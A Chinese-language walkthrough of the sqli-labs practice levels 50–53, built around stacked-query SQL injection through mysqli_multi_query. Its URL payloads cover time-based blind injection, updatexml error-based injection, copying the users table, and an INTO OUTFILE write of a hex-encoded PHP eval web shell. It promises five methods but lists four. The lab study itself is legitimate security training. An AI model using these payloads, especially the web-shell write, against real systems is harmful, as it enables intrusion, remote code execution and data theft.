Less50: 无包裹
与第46关不同的是 使用了mysqli_multi_query函数
mysqli_multi_query() 函数执行一个或多个针对数据库的查询。多个查询用分号进行分隔。
所以我们可以用堆叠注入的方法
五种方法:
- 1.基于时间的盲注
- 2.基于报错注入
- 3.写一句话木马
- 4.使用迭代注入创建删除一个表
1.基于时间的盲注
http://192.168.27.156/sqli-labs/Less-50/?sort=1 and if(length(database()>1),1,sleep(5)) --+
2.基于报错注入
http://192.168.27.156/sqli-labs/Less-50/?sort=1 and updatexml(1,concat(0x7e,(database())),1)--+
3.写一句话木马
http://192.168.27.156/sqli-labs/Less-50/?sort=3 into outfile "C:\phpStudy\WWW\c.php" lines terminated by 0x3c3f70687020406576616c28245f504f53545b27677879275d293b203f3e --+
4.使用迭代注入创建删除一个表
http://192.168.27.156/sqli-labs/Less-50/?sort=3;create table gxy50 like users;insert into gxy50 select * from users;--+
Less-51: 使用’’包裹方法与第50关一致
Less-52: 无包裹不回显错误 不能使用报错注入方法与第50关一致
Less-53:使用’’包裹不回显错误 不能使用报错注入方法与第50关一致
